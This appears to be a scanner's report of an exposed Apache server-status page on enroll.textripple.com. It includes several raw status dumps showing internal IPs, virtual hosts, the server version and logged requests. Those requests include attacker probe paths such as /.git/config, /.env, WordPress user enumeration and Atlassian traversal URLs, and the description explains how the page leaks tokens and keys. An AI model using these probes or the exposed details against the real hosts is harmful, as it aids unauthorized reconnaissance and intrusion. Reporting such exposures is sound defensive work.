95.101.88.100http/1.1 1-01116440/252/55418_ 22.96000.04.231690.69 95.101.88.100http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-01116440/243/55453_ 22.96000.09.401606.63 95.101.88.126http/1.1localhost:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/238/55365_ 22.96000.09.541786.53 95.101.88.100http/1.1localhost:80GET /telescope/requests HTTP/1.1 1-01116440/234/55276_ 22.97000.04.191645.66 95.101.88.100http/1.1localhost:80GET /login.action HTTP/1.1 1-01116440/247/55604R 22.91000.013.021701.07 95.101.88.100http/1.1 1-01116440/245/55294_ 22.96000.01.661699.34 95.101.88.100http/1.1localhost:80GET /.git/config HTTP/1.1 1-01116440/236/55350_ 22.91000.08.211679.77 95.101.88.100http/1.1 2-0229030/822/59596_ 109.93110.036.611946.19 95.101.88.100http/1.1 2-0229030/860/59772_ 110.15000.045.221932.58 95.101.88.126http/1.1localhost:80GET /login.action HTTP/1.1 2-0229030/823/59554_ 110.08200.051.801915.17 95.101.88.100http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 2-0229030/859/60104_ 110.14000.049.341712.93 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93200.044.241872.87 95.101.88.126http/1.1 2-0229030/819/59819_ 109.92310.045.341928.60 95.101.88.100http/1.1 2-0229030/839/59997_ 109.813170.045.231876.02 95.101.88.100http/1.1 2-0229030/842/59781_ 109.96310.048.081881.13 95.101.88.126http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 2-0229030/812/59781_ 110.16000.062.191860.43 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 2-0229030/837/59810_ 110.01300.049.021853.86 95.101.88.126http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 2-0229030/838/59649_ 109.91300.054.491908.23 95.101.88.100http/1.1 2-0229030/862/59892_ 109.91300.030.271826.50 95.101.88.100http/1.1 2-0229030/811/59582_ 109.823190.039.921824.04 95.101.88.100http/1.1 2-0229030/845/60028_ 110.16000.051.681859.50 9
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614a119d9408
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 23-Dec-2023 20:43:48 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 2 hours 55 minutes 27 seconds Server load: 0.02 0.04 0.06 Total accesses: 261406 - Total Traffic: 15.2 GB CPU Usage: u726.95 s139.97 cu0 cs0 - .0902% CPU load .272 requests/sec - 16.6 kB/second - 61.1 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010044no0yes018000 1114846no1yes018010 2105935no0yes018000 39765no0yes018000 4106151no0yes018000 5123272no0yes018000 619783no1yes117010 79491no0yes018000 85337no0yes018000 949846no0yes018000 Sum1002 1179020 ________________________________________________________________ __________________________________________________________W_____ ____________________________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0100440/410/937_ 130.20151710.07.2732.85 127.0.0.1http/1.1 0-0100440/395/925_ 130.9787010.02.733.79 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/397/910_ 130.7411510.05.579.09 127.0.0.1http/1.1 0-0100440/412/927_ 130.2787010.05.716.69 127.0.0.1http/1.1 0-0100440/388/906_ 130.83138010.02.374.08 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/416/942_ 131.0558510.09.7011.51 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/388/895_ 130.55138000.02.853.92 127.0.0.1http/1.1 0-0100440/371/914_ 130.93100710.02.433.34 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/374/879_ 130.25100710.02.904.87 127.0.0.1http/1.1 0-0100440/398/939_ 130.78157510.05.557.46 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/374/904_ 130.51157510.06.608.12 127.0.0.1http/1.1 0-0100440/377/879_ 130.3581010.07.007.84 127.0.0.1http/1.1 0-0100440/381/901_ 130.4158510.05.156.01 127.0.0.1http/1.1 0-0100440/393/923_ 131.1711500.02.443.46 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2619143066496 HT 0-0100440/414/930_ 130.9981010.01.772.91 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/406/930_ 130.7350410.05.907.54 127.0.0.1http/1.1 0-0100440/410/921_ 130.80151710.08.619.87 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/385/906_ 130.492310.01.964.06 127.0.0.1http/1.1 1-01148460/146/660_ 35.9828000.02.336.76 135.125.218.67http/1.1localhost:443GET /.env HTTP/1.1 1-01148460/151/680_ 36.0023500.01.003.25 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2619022981233 HT 1-01148460/153/697_ 35.7927910.04.957.73 135.125.218.67http/1.1 1-01148460/146/677_ 35.8023510.02.784.28 127.0.0.1http/1.1 1-01148460/155/681_ 36.0218010.01.574.34 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/151/678_ 35.8418010.03.246.91 127.0.0.1http/1.1 1-01148460/141/660_ 36.0121010.01.445.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/150/704_ 36.06100.00.464.85 168.143.243.31http/1.1localhost:80GET / HTTP/1.1 1-01148460/153/687_ 35.7021010.00.612.81 127.0.0.1http/1.1 1-01148460/160/651_ 35.9157010.00.532.12 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/148/668_ 35.547410.03.055.03 24.107.74.211http/1.1 1-01148460/154/674_ 35.4957000.00.405.49 127.0.0.1http/1.1 1-01148460/168/702_ 35.9254010.02.186.25 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/145/666_ 35.55765540.02.273.48 127.0.0.1http/1.1 1-01148460/165/684_ 35.4954010.00.383.96 127.0.0.1http/1.1 1-01148460/154/665_ 35.9925800.02.164.76 124.225.164.130http/1.1mhvip.biz:80GET / HTTP/1.1 1-01148460/150/677_ 35.7846410.03.016.73 127.0.0.1http/1.1 1-01148460/154/692_ 35.8025010.02.435.03 104.28.39.30http/1.1 2-01059350/518/518_ 268.7836000.04.654.65 127.0.0.1http/1.1 2-01059350/512/512_ 268.7539010.03.353.35 127.0.0.1http/1.1 2-01059350/476/476_ 269.3034510.02.722.72 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/502/502_ 268.7934500.03.693.69 127.0.0.1http/1.1 2-01059350/482/482_ 269.3036010.05.765.76 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/490/490_ 269.3230010.08.598.59 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/468/468_ 269.3424010.05.705.70 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/529/529_ 269.40010.02.272.27 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01059350/508/508_ 268.8130000.02.492.49 127.0.0.1http/1.1 2-01059350/491/491_ 268.6524000.02.202.20 127.0.0.1http/1.1 2-01059350/470/470_ 269.3517500.02.142.14 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2619083006529 HT 2-01059350/508/508_ 268.6617500.03.133.13 127.0.0.1http/1.1 2-01059350/489/489_ 269.27010.06.336.33 127.0.0.1http/1.1 2-01059350/476/476_ 269.256310.02.302.30 127.0.0.1http/1.1 2-01059350/471/471_ 268.6329500.03.823.82 127.0.0.1http/1.1 2-01059350/510/510_ 268.74450
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614a4dd57142
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:08 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 47 seconds Server load: 1.12 0.80 0.33 Total accesses: 559 - Total Traffic: 7.4 MB CPU Usage: u4.79 s.56 cu0 cs0 - .531% CPU load .555 requests/sec - 7.5 kB/second - 13.6 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no0yes018000 6106024no0yes117000 7106043no3yes018030 8106065no3yes414020 9107415no0yes018000 Sum1007 5175060 ________________________________________________________________ ____________________________________________________________R___ ________________W_W__R___R__________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016990.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516610.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059400.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15300.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.16100.00.000.00 168.143.243.26http/1.1 0-01059290/2/2_ 0.1745410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516910.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05824620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058232170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257900.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19367110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613480.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03380.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04290.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.14210.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.18210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.18110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.22010.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.2611810.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/2/2_ 0.18190.00.000.00 168.143.243.26http/1.1 3-01059500/2/2_ 0.33100.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.33100.00.010.01 168.143.243.30http/1.1 3-01059500/2/2_ 0.33100.00.070.07 168.143.243.30http/1.1 3-01059500/1/1_ 0.23080.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.34200.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.git/config HTTP/1.1 3-01059500/2/2_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/333323e22343e23353e23323/_/;/META-INF/maven/com.atlassia 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/0383e23343e23353e23323/_/;/META-INF/maven/com.atlassian. 3-01059500/1/1_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/2/2_ 0.32100.00.000.00 168.143.243.30http/1.1 3-01059500/2/2_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/1/1_ 0.18180.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/2/2_ 0.20100.00.010.01 168.143.243.30http/1.1 4-01059730/1/1_ 0.20100.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21090.00.070.07 168.143.243.30http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614a79a31b74
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:08 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 47 seconds Server load: 1.12 0.80 0.33 Total accesses: 565 - Total Traffic: 7.5 MB CPU Usage: u4.81 s.56 cu0 cs0 - .533% CPU load .561 requests/sec - 7.6 kB/second - 13.6 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no0yes018000 6106024no0yes018000 7106043no3yes018030 8106065no3yes117020 9107415no0yes018000 Sum1007 1179060 ________________________________________________________________ ________________________________________________________________ ________________________W___________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016990.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516610.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059400.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15300.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.16100.00.000.00 168.143.243.26http/1.1 0-01059290/2/2_ 0.1745410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516910.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05824620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058232170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257900.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19367110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613480.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03380.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04290.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.14210.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.18210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.18110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.22010.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.2611810.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/2/2_ 0.18190.00.000.00 168.143.243.26http/1.1 3-01059500/2/2_ 0.33100.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.33100.00.010.01 168.143.243.30http/1.1 3-01059500/2/2_ 0.33100.00.070.07 168.143.243.30http/1.1 3-01059500/1/1_ 0.23080.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.34200.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.git/config HTTP/1.1 3-01059500/2/2_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/333323e22343e23353e23323/_/;/META-INF/maven/com.atlassia 3-01059500/3/3_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/0383e23343e23353e23323/_/;/META-INF/maven/com.atlassian. 3-01059500/1/1_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/2/2_ 0.32100.00.000.00 168.143.243.30http/1.1 3-01059500/2/2_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/1/1_ 0.18180.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/2/2_ 0.20100.00.010.01 168.143.243.30http/1.1 4-01059730/1/1_ 0.20100.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21090.00.070.07 168.143.243.30http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614a4d053fd6
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:30 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 46 seconds Server load: 0.30 0.26 0.15 Total accesses: 863229 - Total Traffic: 13.4 GB CPU Usage: u768.87 s184.11 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no8yes315050 421293no1yes018010 582938no2yes018020 6113967no0yes018000 794980no1yes117000 9107391no0yes018000 11114344no1yes117000 Sum10013 5175080 ______________________________________________________W______W__ _____W__________________________________________________________ W_______________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00200.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0529210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.235180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00200.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0627130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.755160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0951230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017300.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1151220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9851290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1051190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8967160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98500.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.01040.02.3335.63 168.143.243.30http/1.1 0-0113010/329/4647_ 52.004120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0438140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00160.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932874480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57190.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.760140.01.1838.56 168.143.243.26http/1.1 1-095220/208/2823_ 21.760150.01.1132.33 168.143.243.26http/1.1 1-095220/200/2775_ 21.57180.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7601650.01.4824.13 168.143.243.26http/1.1 1-095220/213/2821_ 21.61000.01.5828.78 168.143.243.26http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.26http/1.1 1-095220/199/2810_ 21.57100.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.760150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.750160.04.0043.00 168.143.243.30http/1.1 1-095220/210/2816_ 21.71020.01.4037.52 168.143.243.30http/1.1 1-095220/199/2793_ 21.750110.08.4739.67 168.143.243.30http/1.1 1-095220/201/2796_ 21.57190.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.740103440.05.3646.10 168.143.243.30http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.30http/1.1 1-095220/204/2789_ 21.741150.02.2841.49 168.143.243.30http/1.1 1-095220/204/2834_ 21.760140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63120.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98510.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9751220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99360.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89221910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.985330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.901750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51500.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.661780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90220.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51600.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.910140.03.9424.64 168.143.243.30http/1.1 2-01220760/384/3025_ 42.95520.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.975320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.911160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.901150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061722350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98340.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069_ 43.002160.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31749d614a749d614af77bb060
Apache Status Apache Server Status for enroll.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:28 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 44 seconds Server load: 0.33 0.27 0.15 Total accesses: 863134 - Total Traffic: 13.4 GB CPU Usage: u768.3 s184.1 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 3 requests currently being processed, 177 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no11yes216091 421293no0yes018000 582938no1yes018010 6113967no0yes018000 794980no1yes018010 9107391no0yes018000 11114344no1yes117000 Sum10014 31770111 _____________________________________________________________W__ ___R____________________________________________________________ ________________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00100.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0527210.03.4748.43 